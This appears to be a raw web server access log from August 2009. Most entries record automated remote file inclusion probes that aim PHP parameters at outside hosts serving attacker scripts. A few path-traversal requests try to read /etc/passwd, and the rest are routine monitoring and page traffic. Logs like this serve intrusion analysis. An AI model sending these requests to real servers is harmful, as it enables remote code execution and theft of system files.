81.176.226.164 - - [03/Aug/2009:02:35:57 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
81.176.226.164 - - [03/Aug/2009:02:35:57 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
81.176.226.164 - - [03/Aug/2009:02:36:01 -0400] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [03/Aug/2009:02:36:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.138.88.25 - - [03/Aug/2009:02:37:18 -0400] "GET /logs/error_log.Q109060200%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:37:31 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:37:31 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:37:31 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:37:59 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:37:59 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:37:59 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
81.176.226.164 - - [03/Aug/2009:02:38:09 -0400] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
81.176.226.164 - - [03/Aug/2009:02:38:09 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
81.176.226.164 - - [03/Aug/2009:02:38:09 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
81.176.226.164 - - [03/Aug/2009:02:38:13 -0400] "GET /logs/access_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
190.144.44.36 - - [03/Aug/2009:02:38:27 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:38:50 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:38:58 -0400] "GET //bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:38:58 -0400] "GET /logs//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:38:58 -0400] "GET /logs/access_log.Q109072500//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:39:07 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:39:15 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:02:39:18 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L106F6C301FE8D000CCA8082+WSEQ(S0060):1+OUITEM(A0200):01241006 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.78.110.131 - - [03/Aug/2009:02:39:26 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=tepos.co.nr? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
203.78.110.131 - - [03/Aug/2009:02:39:29 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=tepos.co.nr? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
203.78.110.131 - - [03/Aug/2009:02:39:32 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=tepos.co.nr? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
116.25.50.200 - - [03/Aug/2009:02:39:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
116.25.50.200 - - [03/Aug/2009:02:39:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
116.25.50.200 - - [03/Aug/2009:02:40:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
116.25.50.200 - - [03/Aug/2009:02:40:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
64.202.107.96 - - [03/Aug/2009:02:40:32 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wattenhofer.com/charts//_MD.TXT??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.202.107.96 - - [03/Aug/2009:02:40:33 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wattenhofer.com/charts//_MD.TXT??? HTTP/1.1" 404 212 "-" "Avant Browser (http://www.avantbrowser.com)"
91.121.83.177 - - [03/Aug/2009:02:40:37 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:40:37 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:40:37 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 12145 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:40:37 -0400] "GET /logs/access_log.Q109072500%20%20//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:41:21 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:41:21 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:41:21 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 12145 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:41:24 -0400] "GET /logs/error_log.Q109072300%20%20//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:02:41:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.83.177 - - [03/Aug/2009:02:41:47 -0400] "GET /logs/error_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:08 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:42:15 -0400] "GET /logs/access_log.Q109061900%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:42:29 -0400] "GET /logs/access_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:42:30 -0400] "GET /logs/error_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:32 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:32 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:33 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:33 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:33 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:53 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:42:58 -0400] "GET /logs/access_log.Q109061900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:42:59 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:43:12 -0400] "GET /logs/access_log.Q109060200%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:02:43:14 -0400] "GET /logs/access_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:43:53 -0400] "GET //skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:43:53 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:43:53 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
91.121.67.7 - - [03/Aug/2009:02:44:14 -0400] "GET /logs/access_log.Q109070400/index.php?seite=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:02:44:15 -0400] "GET /index.php?seite=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:02:44:15 -0400] "GET /logs/index.php?seite=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
213.149.105.8 - - [03/Aug/2009:02:44:33 -0400] "GET /logs/access_log.Q109071500//skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:45:00 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:02:45:20 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:45:29 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:45:29 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
72.55.179.121 - - [03/Aug/2009:02:45:36 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:45:37 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:45:37 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:02:46:04 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
72.55.179.121 - - [03/Aug/2009:02:46:09 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.133.233.26 - - [03/Aug/2009:02:46:14 -0400] "GET //modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
174.133.233.26 - - [03/Aug/2009:02:46:14 -0400] "GET /logs/access_log.Q109052400//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
174.133.233.26 - - [03/Aug/2009:02:46:14 -0400] "GET /logs//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:02:46:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.117.207.76 - - [03/Aug/2009:02:46:32 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:02:46:34 -0400] "GET //_head.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
174.133.233.26 - - [03/Aug/2009:02:46:35 -0400] "GET //modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
174.133.233.26 - - [03/Aug/2009:02:46:35 -0400] "GET /logs//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.133.233.26 - - [03/Aug/2009:02:46:35 -0400] "GET /logs/access_log.Q109052400//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:46:40 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:02:46:44 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
74.200.90.19 - - [03/Aug/2009:02:46:52 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.200.90.19 - - [03/Aug/2009:02:46:55 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
74.200.90.19 - - [03/Aug/2009:02:46:55 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
213.149.105.8 - - [03/Aug/2009:02:47:43 -0400] "GET /logs/access_log.Q109072500%20%20//skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:47:43 -0400] "GET /logs/access_log.Q109052600/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:47:43 -0400] "GET /logs/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:47:47 -0400] "GET /logs/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:47:50 -0400] "GET /logs/access_log.Q109051000%20%20/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:47:51 -0400] "GET /calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:47:52 -0400] "GET /logs/access_log.Q109051000/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:02:47:54 -0400] "GET //?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
219.117.207.76 - - [03/Aug/2009:02:47:54 -0400] "GET /logs/access_log.Q109052600/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:48:02 -0400] "GET /logs/access_log.Q109052600%20%20/calendre/config.php?inc_dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:48:02 -0400] "GET /logs/access_log.Q109071500%20%20//skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:48:13 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:48:14 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:48:15 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:48:15 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
203.78.110.131 - - [03/Aug/2009:02:49:02 -0400] "GET /logs/access_log.Q109072500//ladder/?dir[func]=&dir[base]=tepos.co.nr? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
203.78.110.131 - - [03/Aug/2009:02:49:02 -0400] "GET //ladder/?dir[func]=&dir[base]=tepos.co.nr? HTTP/1.1" 404 206 "-" "libwww-perl/5.65"
203.78.110.131 - - [03/Aug/2009:02:49:04 -0400] "GET /logs//ladder/?dir[func]=&dir[base]=tepos.co.nr? HTTP/1.1" 404 211 "-" "libwww-perl/5.65"
74.200.90.19 - - [03/Aug/2009:02:49:27 -0400] "GET //include/write.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
128.121.191.69 - - [03/Aug/2009:02:49:35 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:49:35 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:49:35 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
128.121.191.69 - - [03/Aug/2009:02:49:51 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://dildo.rs/id1.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:49:56 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
174.133.233.26 - - [03/Aug/2009:02:50:03 -0400] "GET /logs/access_log.Q109052400%20%20//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:50:17 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:50:17 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:02:50:17 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:02:50:43 -0400] "GET //outlogin.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
119.152.70.207 - - [03/Aug/2009:02:51:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.70.207 - - [03/Aug/2009:02:51:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.70.207 - - [03/Aug/2009:02:51:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.70.207 - - [03/Aug/2009:02:51:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.59.12.99 - - [03/Aug/2009:02:51:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.133.233.26 - - [03/Aug/2009:02:51:39 -0400] "GET /logs/access_log.Q109052400%20%20//modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
